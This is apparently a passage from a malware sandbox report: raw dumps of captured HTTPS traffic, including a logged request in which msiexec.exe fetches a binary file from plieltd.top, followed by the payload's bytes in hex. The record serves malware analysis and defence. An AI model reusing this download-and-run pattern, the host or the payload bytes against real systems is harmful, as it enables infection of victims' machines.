                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 32 54 6d 67 53 6e 6a 52 56 58 72 52 5a 68 33 4b 6c 47 58 6a 37 2f 71 61 67 75 78 42 55 76 4b 4b 48 42 44 75 6d 4c 43 56 32 75 4c 50 46 55 39 34 39 46 70 56 35 4d 46 6f 59 49 42 68 62 67 35 59 2f 64 6b 4b 34 4f 4a 4c 51 58 58 61 57 48 41 44 35 32 65 2b 65 52 61 42 4d 69 48 32 78 35 71 76 41 62 58 52 4c 58 56 59 47 37 56 71 52 63 6e 52 42 72 53 5a 4b 42 59 33 54 6e 47 73 57 4d 54 34 77 72 79 62 70 77 32 76 36 35 70 32 2f 48 53 4a 74 53 63 37 37 4f 66 50 75 69 64 6e 41 62 79 33 6f 63 34 53 47 55 67 51 47 5a 38 41 56 58 7a 6a 58 56 2b 50 48 35 6f 6a 6a 6c 4f 71 71 64 53 6c 75 46 73 46 4d 78 45 47 47 4a 33 59 4f 64 6e 41 34 42 6f 4a 6d 73 5a 73 4e 5a 71 73 42 41 6d 65 78 7a 6d 43 64 36 37 68 44 5a 57 47 58 31 33 53 37 66 63 4a 6f 71 64 45 5a 37 6b 72 4e 76 42
                                                                                                      Data Ascii: 2TmgSnjRVXrRZh3KlGXj7/qaguxBUvKKHBDumLCV2uLPFU949FpV5MFoYIBhbg5Y/dkK4OJLQXXaWHAD52e+eRaBMiH2x5qvAbXRLXVYG7VqRcnRBrSZKBY3TnGsWMT4wrybpw2v65p2/HSJtSc77OfPuidnAby3oc4SGUgQGZ8AVXzjXV+PH5ojjlOqqdSluFsFMxEGGJ3YOdnA4BoJmsZsNZqsBAmexzmCd67hDZWGX13S7fcJoqdEZ7krNvB
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 61 78 71 48 34 44 72 39 6b 58 6d 48 46 5a 4f 4a 77 77 37 69 6f 4b 45 66 45 6a 77 36 6b 42 6d 66 68 49 35 66 49 6c 36 38 48 69 56 78 33 7a 6c 4c 73 68 66 6e 41 6e 45 57 41 6a 78 66 4e 6e 75 35 58 6d 67 54 36 4e 45 74 32 59 34 77 6a 35 6d 6f 77 77 54 55 6d 46 78 49 38 79 31 54 77 2b 6a 31 41 6d 77 39 4c 69 58 64 63 41 54 52 62 57 67 39 52 62 54 6e 33 66 63 6d 49 45 6f 72 76 43 51 71 32 73 2b 4e 50 77 37 39 4f 5a 63 61 38 6f 54 50 68 37 66 50 49 69 61 73 6f 49 4a 6b 6d 71 38 6f 36 47 67 5a 44 61 43 51 38 56 6a 43 66 4a 71 41 6c 4e 44 6d 72 33 75 78 79 7a 53 4b 6d 58 46 51 35 39 61 4d 37 55 6d 4f 33 6d 51 63 61 4e 6b 4d 78 30 43 69 61 66 64 55 51 32 75 54 58 55 52 71 73 46 58 43 2f 7a 77 72 57 6f 73 74 47 73 6c 32 48 66 55 53 79 6d 6b 34 68 54 61 58 50 77 33
                                                                                                      Data Ascii: axqH4Dr9kXmHFZOJww7ioKEfEjw6kBmfhI5fIl68HiVx3zlLshfnAnEWAjxfNnu5XmgT6NEt2Y4wj5mowwTUmFxI8y1Tw+j1Amw9LiXdcATRbWg9RbTn3fcmIEorvCQq2s+NPw79OZca8oTPh7fPIiasoIJkmq8o6GgZDaCQ8VjCfJqAlNDmr3uxyzSKmXFQ59aM7UmO3mQcaNkMx0CiafdUQ2uTXURqsFXC/zwrWostGsl2HfUSymk4hTaXPw3
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 49 76 6c 44 37 4f 48 6b 44 58 53 7a 39 4f 35 33 49 74 32 47 6d 6a 6c 34 42 42 4f 66 79 58 4d 41 54 48 63 4c 66 69 65 66 73 45 47 54 2f 55 4a 6c 38 33 73 49 67 75 51 71 67 52 69 2f 67 33 4e 46 6b 30 37 63 42 59 39 67 2b 37 33 58 35 43 75 4a 36 77 59 61 6e 37 73 71 37 36 4f 41 34 4a 75 5a 77 66 31 6c 54 75 42 72 7a 6f 58 45 4a 73 4f 5a 41 2f 6d 4c 4f 45 78 72 7a 6b 41 6c 33 50 2b 36 34 39 54 75 7a 4c 30 39 74 72 4b 76 38 6f 58 58 46 4a 77 58 6b 63 62 4e 36 67 77 78 51 30 2b 70 79 50 59 57 2f 2b 59 2f 78 49 6c 6e 6a 57 7a 59 49 31 49 72 71 51 42 72 7a 45 55 79 32 45 75 5a 41 6f 6e 62 48 55 4d 69 65 37 6c 4b 53 43 66 72 58 6f 76 6f 57 73 34 4b 6b 50 5a 55 4d 66 75 5a 69 61 45 4b 45 56 49 75 71 34 2f 65 75 4e 36 43 4e 6d 49 48 51 75 51 44 4b 51 35 67 4c 51 57
                                                                                                      Data Ascii: IvlD7OHkDXSz9O53It2Gmjl4BBOfyXMATHcLfiefsEGT/UJl83sIguQqgRi/g3NFk07cBY9g+73X5CuJ6wYan7sq76OA4JuZwf1lTuBrzoXEJsOZA/mLOExrzkAl3P+649TuzL09trKv8oXXFJwXkcbN6gwxQ0+pyPYW/+Y/xIlnjWzYI1IrqQBrzEUy2EuZAonbHUMie7lKSCfrXovoWs4KkPZUMfuZiaEKEVIuq4/euN6CNmIHQuQDKQ5gLQW
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 6f 73 59 75 39 5a 37 47 62 58 50 38 4d 35 69 62 5a 4b 74 43 41 71 65 6c 76 75 74 6a 6a 6d 77 4a 6e 38 34 47 78 66 34 53 4e 78 67
                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABosYu9Z7GbXP8M5ibZKtCAqelvutjjmwJn84Gxf4SNxg
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 4a 63 63 49 30 4d 47 6c 4c 69 4d 6e 72 67 35 58 4e 52 6d 48 79 4d 48 45 50 73 47 6f 74 56 50 73 34 66 51 74 78 4c 4b 50 42 47 37 54 58 33 56 30 63 36 55 56 71 4c 50 65 48 76 65 38 61 66 78 76 44 50 67 4a 6e 76 68 2f 47 56 62 47 62 57 4b 74 2f 63 6c 76 4f 46 53 46 2f 34 76 68 2f 6b 7a 2b 6d 51 63 36 6e 72 30 62 63 58 4b 4c 4a 35 58 50 39 41 6f 2f 51 2f 48 39 44 6d 41 47 65 36 71 30 4f 76 48 2f 37 58 37 4e 37 58 4a 2b 41 42 6b 53 2b 6d 68 45 4d 73 5a 73 43 4f 67 6d 38 68 53 52 68 6a 45 57 61 53 46 65 72 67 58 4a 43 48 58 44 4f 52 55 72 63 6a 4b 45 33 79 31 79 48 73 34 54 50 2b 75 68 42 75 6b 49 66 52 45 67 4d 44 34 52 57 69 77 31 43 54 49 4b 6a 69 48 34 43 73 7a 74 55 6e 6f 79 75 50 39 30 57 58 65 4d 68 6c 2f 66 72 47 59 4f 56 48 58 72 46 68 7a 42 70 49 4e
                                                                                                      Data Ascii: JccI0MGlLiMnrg5XNRmHyMHEPsGotVPs4fQtxLKPBG7TX3V0c6UVqLPeHve8afxvDPgJnvh/GVbGbWKt/clvOFSF/4vh/kz+mQc6nr0bcXKLJ5XP9Ao/Q/H9DmAGe6q0OvH/7X7N7XJ+ABkS+mhEMsZsCOgm8hSRhjEWaSFergXJCHXDORUrcjKE3y1yHs4TP+uhBukIfREgMD4RWiw1CTIKjiH4CsztUnoyuP90WXeMhl/frGYOVHXrFhzBpIN
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 5a 4c 35 4d 37 31 36 4c 54 50 7a 56 53 57 65 34 30 53 41 4e 6e 73 56 64 49 61 34 49 5a 4c 5a 2f 68 67 4c 43 38 55 53 68 2f 66 70 4f 7a 44 79 69 6c 4a 6d 71 69 65 48 2f 6f 7a 41 6e 44 69 36 52 39 4d 6f 4a 70 43 53 51 2b 49 68 67 51 68 37 53 77 6d 77 4b 72 52 34 38 66 32 50 67 45 52 71 74 57 46 50 6c 6a 38 66 70 41 6b 53 53 32 75 69 64 68 63 7a 46 50 74 5a 76 32 38 2b 6a 71 41 6d 65 78 78 78 4c 74 54 69 53 56 78 6e 30 7a 41 53 65 4e 58 49 64 4e 73 35 73 43 4b 58 75 34 7a 7a 51 4b 4d 6b 34 51 39 52 72 78 7a 5a 6e 45 4f 65 5a 43 6d 2f 6a 48 41 52 72 42 6d 74 50 73 4d 6a 45 74 45 75 52 6d 72 77 59 37 6c 4d 61 55 4f 59 39 49 4a 63 45 47 4e 59 7a 57 6e 62 5a 6d 77 6e 4d 55 59 54 37 58 4c 6c 2f 75 46 76 30 48 73 64 65 77 32 30 64 33 56 6e 52 2b 54 74 71 35 58 75
                                                                                                      Data Ascii: ZL5M716LTPzVSWe40SANnsVdIa4IZLZ/hgLC8USh/fpOzDyilJmqieH/ozAnDi6R9MoJpCSQ+IhgQh7SwmwKrR48f2PgERqtWFPlj8fpAkSS2uidhczFPtZv28+jqAmexxxLtTiSVxn0zASeNXIdNs5sCKXu4zzQKMk4Q9RrxzZnEOeZCm/jHARrBmtPsMjEtEuRmrwY7lMaUOY9IJcEGNYzWnbZmwnMUYT7XLl/uFv0Hsdew20d3VnR+Ttq5Xu
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 48 6c 35 54 6c 5a 74 46 54 4f 53 65 77 50 62 2f 48 6f 59 31 48 6a 41 4d 36 76 65 34 61 66 78 4f 5a 78 77 4a 6e 76 68 2f 30 64 62 47 62 57 34 2b 57 63 67 46 6e 66 61 67 7a 6a 55 35 34 68 53 65 32 51 4b 51 6e 4f 41 59 2b 5a 62 47 62 69 36 54 6e 4a 54 4e 78 76 70 4f 44 69 62 66 4e 58 4b 45 77 62 61 4f 5a 63 68 61 44 6b 65 4d 62 59 55 67 77 62 54 6f 78 6f 58 69 4c 63 65 62 64 71 65 77 4d 35 37 72 69 7a 79 5a 50 57 59 6f 6f 62 7a 6f 37 78 42 58 7a 49 71 42 41 61 63 31 73 4a 61 7a 64 77 4e 4d 62 78 36 73 59 5a 4a 6c 51 78 32 57 31 50 35 6a 4e 2b 68 64 63 4e 4f 45 6a 71 41 66 62 45 7a 64 67 4b 34 58 78 55 69 32 4c 4d 5a 2b 45 55 4d 62 44 34 71 37 7a 61 46 4a 4c 69 31 38 78 67 2b 35 6c 32 65 49 62 71 36 4d 54 53 38 43 47 46 33 44 72 32 72 54 48 70 33 55 43 65 50
                                                                                                      Data Ascii: Hl5TlZtFTOSewPb/HoY1HjAM6ve4afxOZxwJnvh/0dbGbW4+WcgFnfagzjU54hSe2QKQnOAY+ZbGbi6TnJTNxvpODibfNXKEwbaOZchaDkeMbYUgwbToxoXiLcebdqewM57rizyZPWYoobzo7xBXzIqBAac1sJazdwNMbx6sYZJlQx2W1P5jN+hdcNOEjqAfbEzdgK4XxUi2LMZ+EUMbD4q7zaFJLi18xg+5l2eIbq6MTS8CGF3Dr2rTHp3UCeP
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 64 2f 7a 45 54 35 55 31 54 38 34 74 6a 4a 6b 79 6e 6d 76 30 4a 69 55 46 61 58 31 37 45 2f 64 4b 4a 6d 67 4a 6e 57 56 5a 46 5a 72 48 4a 75 48 4c 38 48 78 33 6d 51 36 45 79 75 79 41 61 36 46 58 44 74 6f 76 6d 51 2b 33 59 59 50 6b 61 77 4c 57 56 54 37 44 75 71 33 48 47 46 79 4d 38 58 36 52 4f 69 2b 4c 68 4b 77 69 6b 31 65 73 59 36 69 65 49 48 71 35 6e 73 5a 73 4e 34 73 69 61 41 6d 64 4f 37 6d 62 75 4e 46 49 44 5a 37 48 4a 75 47 5a 48 2b 72 72 6d 51 39 6f 49 41 33 34 61 38 42 56 49 6e 6e 58 75 67 7a 4f 39 53 4c 44 65 57 74 70 58 43 51 66 4c 65 62 4b 38 31 70 65 51 63 44 30 4a 4d 76 4c 42 6c 56 63 44 2f 62 36 4b 31 36 48 54 73 6e 58 36 33 61 55 66 66 52 45 44 70 50 55 77 66 4d 64 78 45 43 66 4a 50 75 75 74 51 63 68 79 31 6e 46 65 39 7a 56 35 2f 71 58 6e 49 2f
                                                                                                      Data Ascii: d/zET5U1T84tjJkynmv0JiUFaX17E/dKJmgJnWVZFZrHJuHL8Hx3mQ6EyuyAa6FXDtovmQ+3YYPkawLWVT7Duq3HGFyM8X6ROi+LhKwik1esY6ieIHq5nsZsN4siaAmdO7mbuNFIDZ7HJuGZH+rrmQ9oIA34a8BVInnXugzO9SLDeWtpXCQfLebK81peQcD0JMvLBlVcD/b6K16HTsnX63aUffREDpPUwfMdxECfJPuutQchy1nFe9zV5/qXnI/
                                                                                                      2024-10-17 13:03:08 UTC8000INData Raw: 4f 57 6b 62 6d 67 61 78 79 66 35 63 61 4d 73 35 76 48 77 38 42 69 46 69 44 56 33 51 6c 6f 6c 52 32 48 71 74 6d 73 5a 73 6c 30 65 33 4b 67 39 49 59 6d 67 4a 6e 66 46 44 6d 56 6a 41 75 71 32 61 78 6d 2b 49 76 41 56 47 44 34 68 69 61 41 6d 64 49 55 66 55 79 4e 45 74 43 6d 44 77 79 41 32 65 78 37 76 55 6e 64 70 76 66 33 66 32 7a 5a 4a 42 32 75 66 64 66 58 52 6f 79 30 38 34 4d 56 65 61 42 49 6b 76 76 53 63 32 38 62 37 47 62 41 75 5a 50 5a 41 66 66 77 70 53 50 55 57 61 59 41 6a 6b 77 71 39 46 51 6d 61 53 48 70 74 63 65 77 57 4b 73 41 63 35 68 6e 49 4b 59 71 37 64 63 41 6f 48 43 57 71 33 6d 67 61 71 54 66 4d 49 61 4d 70 2b 59 33 4c 44 69 61 52 6f 79 43 71 39 30 37 46 39 66 62 63 65 52 74 42 72 4e 59 62 61 32 66 36 69 33 6e 4d 56 6e 4b 6b 72 73 79 7a 43 72 58 32
                                                                                                      Data Ascii: OWkbmgaxyf5caMs5vHw8BiFiDV3QlolR2HqtmsZsl0e3Kg9IYmgJnfFDmVjAuq2axm+IvAVGD4hiaAmdIUfUyNEtCmDwyA2ex7vUndpvf3f2zZJB2ufdfXRoy084MVeaBIkvvSc28b7GbAuZPZAffwpSPUWaYAjkwq9FQmaSHptcewWKsAc5hnIKYq7dcAoHCWq3mgaqTfMIaMp+Y3LDiaRoyCq907F9fbceRtBrNYba2f6i3nMVnKkrsyzCrX2


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.549797104.21.56.1894431276C:\Windows\SysWOW64\msiexec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-17 13:03:35 UTC164OUTGET /nwnNBPSeuTV8.bin HTTP/1.1
                                                                                                      User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: plieltd.top
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-10-17 13:03:35 UTC807INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 17 Oct 2024 13:03:35 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 494656
                                                                                                      Connection: close
                                                                                                      Last-Modified: Thu, 17 Oct 2024 11:13:06 GMT
                                                                                                      ETag: "78c40-624aa45525608"
                                                                                                      Cache-Control: max-age=14400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 2868
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ucY3IlWD6%2FyX21JU6T2sMkXSY%2FOWaHnatI4hlrOwi%2FOfG0gLc88iP0GbDfMBmOtLDbMO5M92%2Fn%2Fgo5r1lciBM%2BkneTT4qXX5Is1nZhaERD96Hif9dgBiQx1CmCDiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d407d5718446bc5-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-10-17 13:03:35 UTC562INData Raw: 57 4d 70 a7 e6 eb cc 96 2a 76 47 23 f3 20 f9 63 0d 89 4f b1 e0 3a 48 60 58 e1 aa b5 35 1d ca ac e1 16 6d f2 be 8d 26 a4 60 2d 78 33 b8 58 42 3d fd 9e fe 1f 9e 0e cc 47 67 ea 10 2d 1a 21 25 02 35 66 ca 17 e5 d4 07 5f 9c ea 9c 0b 9a 05 cf d0 3c 4e dd 25 51 77 15 ec aa 84 ba 6d 44 57 41 86 c2 2b c2 e4 37 eb aa 7d fb 64 92 ce 31 d9 48 02 46 c1 65 07 08 f5 b4 e2 75 4d c1 31 8a a8 b2 9d db 80 11 9b 36 9f 6e d4 bd b4 66 e5 f5 d7 fe cb 93 cd fc 1b 32 a7 9a ff b3 e8 48 b5 fd 44 14 54 76 8a 94 38 1e ff de 0a e0 fa b5 ef e1 50 c1 12 da d5 32 7f e2 e9 8f 50 8e 78 37 34 f6 27 a5 f4 de f0 e3 8d 9f 5a fb c5 8e 84 5e 04 7e 11 02 5b 0f c2 6c 8b e4 ca fc 3b 47 b6 e1 43 3c 3f 1a 03 38 3e 4b 1e 26 86 57 4e 80 72 32 31 eb 8c f3 88 48 5b 5b b0 d1 fe 91 46 22 97 fa 8c 72 af a2
                                                                                                      Data Ascii: WMp*vG# cO:H`X5m&`-x3XB=Gg-!%5f_<N%QwmDWA+7}d1HFeuM16nf2HDTv8P2Px74'Z^~[l;GC<?8>K&WNr21H[[F"r
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: d5 30 83 00 04 6a 31 86 00 8b aa 55 02 3d c8 0a 04 ae e2 25 27 c3 a0 7e f8 e7 41 24 7c ef ae 66 a2 75 fb 78 3f be a0 85 6f 27 9e a7 44 98 08 2f 40 5e f1 0b e2 19 8f c6 73 e4 9a d8 6f 34 b1 5d ab d6 d1 aa 3f 16 9f e9 1b 7a 13 a1 de ae 2a 83 a3 7a 1b 49 c2 1f 92 70 12 46 02 92 78 b7 72 3e 21 5c 1c df e9 fc c1 ef fd 38 03 87 5d 7f be 4b 10 85 c7 f0 65 96 50 06 1a ca f6 6e 90 bc e7 1d 79 35 83 2f 14 f9 6c 20 6d 45 77 38 f1 28 3c 8d 9a f8 d9 3c 9f ed ea 12 fd 77 02 6f 38 46 48 65 f5 02 3c 8d 66 3c f4 75 f2 83 b6 ba d8 6e a6 ae ba 3e 7a cc 4c 74 9d 0d 15 e6 b4 3b b3 06 ef fc 33 8f cf cd 20 9a a6 05 28 2f 8d eb a3 15 39 78 62 6f 4c 24 b4 6f f9 5e 26 a8 da fd bc 3d c7 c6 cf e6 10 a1 dc d7 d4 d7 03 eb 1a e9 7b 5e a3 f9 87 bb f9 a4 4a 97 eb f5 d7 b1 7a f0 08 76 9b
                                                                                                      Data Ascii: 0j1U=%'~A$|fux?o'D/@^so4]?z*zIpFxr>!\8]KePny5/l mEw8(<<wo8FHe<f<un>zLt;3 (/9xboL$o^&={^Jzv
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 96 3f 93 d3 cf 3b 69 d2 e9 73 85 77 1e ee ad 5a 08 31 da 23 ff 97 aa 7d 77 cd 57 6e 77 fd 09 dc 62 86 a0 bb e8 56 01 de 42 b9 2b f3 bc 57 12 11 c5 30 2b c4 2f 3e 01 29 a6 80 e2 cc 82 b7 4c 5d b4 22 51 3b cc 8e 19 ac 45 d7 ca f7 74 2c 83 65 06 e9 03 09 26 d7 55 3b d3 7e c3 5e 90 99 e9 5a 36 55 bc 02 ef 90 bc c7 c4 84 3f d1 e2 54 e9 b5 8e 6a 42 34 42 2b 2a 4d c3 19 ee 18 b0 f4 c9 a4 24 e6 06 f8 f3 26 78 54 05 96 a3 d4 ef 7a ac e9 9c 52 a6 43 2f 86 c3 4e 35 58 22 76 15 84 83 05 ff 6d ac 58 75 85 c2 72 01 5d af bc ed 7d 13 03 e1 cf 31 b1 3b 83 03 c1 8d fe 3b f6 b4 bb b6 25 81 f9 d4 a9 da cd 1d d9 ab 6a 23 5f f5 5c 9c 5c 98 bc f8 64 ef a3 59 2a 8b 2c 40 0b 44 45 84 c2 68 3e c9 21 7a 3b 6a d7 77 18 3e 65 6d 57 c3 93 82 0c 1c af c4 75 b7 52 69 11 cc e4 ea dd 2b
                                                                                                      Data Ascii: ?;iswZ1#}wWnwbVB+W0+/>)L]"Q;Et,e&U;~^Z6U?TjB4B+*M$&xTzRC/N5X"vmXur]}1;;%j#_\\dY*,@DEh>!z;jw>emWuRi+
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: a6 3d a9 b8 2a a7 3c 3c 63 45 21 c4 d5 e7 f2 b2 c1 c3 28 e9 4d 7c 66 34 3d 2b 0f 3c 0a a5 da 34 eb 31 b9 4c b3 10 4a 6a 04 1c 2c 75 2c 1f bc e4 85 64 af 83 a3 a7 ae c6 ac 49 35 45 fb fd b9 bd e0 8a 8f 1f 43 82 24 56 be 5f cc 18 c3 98 d3 a9 92 05 9d 7e d2 c3 33 f7 5e 92 c0 7e a9 ab eb b4 f0 f6 f9 f8 7e ac 12 c3 38 ab e3 d3 ff c3 92 87 65 bf 48 ac 96 60 50 26 fd 6b 0e 8b 75 2e b2 7c a7 c7 61 56 8f 62 cd b5 59 e4 ca 2e 65 55 d6 2b 50 ae 94 7e 17 b4 67 02 31 c2 00 08 c3 a0 3e a0 8e 17 f0 57 22 4f e2 93 59 03 47 6a d6 0e 02 38 24 db f2 07 6c 7e 60 a5 d6 c6 12 23 c8 4a a5 bd 09 c8 1a bc 8f 3b fd 22 c9 d9 48 95 6a 77 30 07 94 34 c0 c4 f5 15 21 c4 cd 5c 3c 22 43 15 31 46 d7 91 b9 fd eb 30 30 3d 1c d1 85 07 12 44 8f 11 d2 e6 2d af 06 3a 57 e3 6b 0c 55 46 11 a6 be
                                                                                                      Data Ascii: =*<<cE!(M|f4=+<41LJj,u,dI5EC$V_~3^~~8eH`P&ku.|aVbY.eU+P~g1>W"OYGj8$l~`#J;"Hjw04!\<"C1F00=D-:WkUF
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 0d 83 ad 1a 3f 6f 3a 1d 65 e3 f0 dc ea 59 1c 1a 22 6f 7f 97 bc 8d 33 da bd a9 98 12 58 a8 0a 2a 45 21 c7 c4 e8 16 ca 9a 5b 15 16 d8 2d f7 a6 32 94 28 28 38 e5 d5 4f b2 02 9f 65 4b 7b f4 d4 6e a9 f1 44 21 7b ce 3a ff 3e 10 ec 1a 8b a8 cd 3f a1 f4 c4 a6 96 55 de 55 6b e7 9a 30 72 3d 07 28 2f d3 e0 41 48 fb 68 62 39 c7 d5 5b e2 fa 5e 26 23 8e d9 b4 06 05 b0 dd 6d 9e 49 16 95 fa a5 1b 53 61 b7 78 56 24 73 45 bf f9 dc 81 95 eb b9 1b 58 ab f6 0f 76 23 ff 27 1e b8 a1 6b 5a e2 0a b4 63 9f b8 94 95 d0 56 ee 6d d1 42 15 e2 de 74 bd 9b d2 26 8b 24 6c 48 5a 7c b7 a3 39 c0 ce de 06 12 01 6f ea 2e fb 72 c2 dc 8b a0 33 49 dd f4 3f 9f c8 9c 06 98 e9 89 81 60 b8 19 e6 41 aa e2 e8 72 c6 47 7c cf 63 e6 a4 9c a4 57 f1 a8 3f 10 54 08 b5 9d 4e c9 97 e9 d1 21 9e 33 cd 8e 80 22
                                                                                                      Data Ascii: ?o:eY"o3X*E![-2((8OeK{nD!{:>?UUk0r=(/AHhb9[^&#mISaxV$sEXv#'kZcVmBt&$lHZ|9o.r3I?`ArG|cW?TN!3"
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 0f df ad 80 df 26 35 3e 16 f8 cb fa 9d d5 a6 1e bd d2 8d e0 a5 ce 0e 9c 19 6d 19 cc cd 50 d4 97 ea 19 2b 8c af 13 21 ca e3 a6 07 30 2f d4 a6 d7 28 51 77 4c bc 61 4f 52 ec ba a8 be 0d 0a c3 ad e9 37 eb 29 5b fb ef 5d 26 ab 27 b7 fd cd 0a ee f7 e0 64 4a 1d 8a c6 d7 ba 59 20 a2 75 01 9c ab 95 bd 7e 67 92 53 66 67 c3 38 7f ba 4b 71 40 23 94 1f 96 a0 d6 10 81 68 56 e0 0e 7e 3b 54 21 07 29 6c de 43 c9 c3 93 db 44 7d 9c a9 22 c5 fe 03 91 02 0c db a7 55 87 b4 48 d2 33 a5 7f 3a 00 1e a0 5e 04 09 ab b0 8b 77 0e 12 1f 84 cd 7f 48 4b f5 e6 80 7f ad b8 c2 3b c2 50 e1 c0 f6 c7 33 a1 20 20 63 f5 14 d5 f8 92 b2 5d 69 ae 3e 76 9e 49 ce 9b b9 1c b3 09 3b 75 f0 20 b5 8b 7f 8c a5 3f 31 82 02 04 98 b8 45 21 67 55 c3 e9 95 23 6f 9d 81 48 40 e5 ff f9 b9 b3 4e 8d 5d 8b 46 b1 8d
                                                                                                      Data Ascii: &5>mP+!0/(QwLaOR7)[]&'dJY u~gSfg8Kq@#hV~;T!)lCD}"UH3:^wHK;P3 c]i>vI;u ?1E!gU#oH@N]F
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 96 7f b9 bc c3 4c 80 98 1f 61 44 1e cf c5 f9 3b 5a 3e 6b 94 37 e4 f7 3c 79 71 bd 18 35 6c 39 d2 99 ae 62 4c aa 29 28 88 eb e7 5a 1b ba 47 bc 19 8e ac 0a 7c ec 41 da 8a 17 a6 e8 4c a3 0a 6f 04 88 97 6c 2e 0e 92 b3 eb e0 dc 33 21 96 eb 02 a2 e9 a6 9f 9f d9 2e 72 e1 12 45 56 70 b0 6b 56 29 02 ec 28 0d 9f 1b f9 a6 b4 e5 6b 35 98 19 ff 06 4a a2 44 59 9e a7 25 14 e5 0a 26 4c 17 39 28 27 21 d3 15 59 58 c1 04 d2 3c d1 50 f9 5c 17 42 b5 91 69 16 9a 69 db da 72 9f 45 28 9e a8 a8 40 c3 e1 81 d9 2b 85 05 83 43 bd 55 00 14 82 4f aa 21 bb b4 4e bd 44 6e c5 fe 9a e5 0b ef eb 75 3a 51 7c f2 e9 ca 06 28 5b ab f7 b4 c1 9c 33 f5 a7 6e 77 27 be c7 27 b4 6a a8 ca 77 fb 11 96 ba c9 3e d8 00 76 2f 0c 83 f1 0a e6 0d ea 62 d0 81 22 54 41 7f 33 49 d9 c0 29 05 48 74 19 f7 53 2d 40
                                                                                                      Data Ascii: LaD;Z>k7<yq5l9bL)(ZG|ALol.3!.rEVpkV)(k5JDY%&L9('!YX<P\BiirE(@+CUO!NDnu:Q|([3nw''jw>v/b"TA3I)HtS-@
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: c7 e5 ea ac 93 5c d9 dc fe f1 43 49 e3 ca 27 7f b8 5e 23 14 3e a9 b2 91 79 83 7a a1 db 96 8b 44 8d 10 41 7f 6f 51 28 4e f9 30 03 b4 93 b8 b0 45 b8 49 67 57 0f 14 e5 30 c9 b6 df f4 20 01 91 20 96 42 cf c4 2e e8 bf 9b 8b b5 67 d2 87 63 5a f8 77 6f b1 e9 01 28 c5 c8 c6 85 06 46 d6 72 c2 57 08 04 7e 5c 34 d8 66 14 06 1e 6e f0 eb 76 76 44 84 72 4b 5a aa 96 ad 3d 87 71 1c 46 04 e7 ce 9d 5b 7c 8b ff 5c 38 ee 35 4e 1e 33 9d 18 aa d1 71 08 ce 32 f1 29 a1 b3 79 11 8d 33 da 47 cf d2 ca 83 87 42 d4 11 1e 89 a7 92 10 36 13 d0 06 db 74 6c a1 7d 38 b7 d2 31 2a a1 e2 10 d3 2e ba 8c 3d 6b fd 99 16 f0 f4 e9 53 1e 52 d2 97 10 c6 30 7d 65 ad 81 a9 f3 d4 10 22 6e 30 72 5d 5e 53 b6 cf ec b4 af e0 8d f6 f2 41 28 72 15 a6 21 e6 9a 7a 36 ca 22 8e 99 b2 9e 92 64 af df 2b c3 06 8e
                                                                                                      Data Ascii: \CI'^#>yzDAoQ(N0EIgW0 B.gcZwo(FrW~\4fnvvDrKZ=qF[|\85N3q2)y3GB6tl}81*.=kSR0}e"n0r]^SA(r!z6"d+
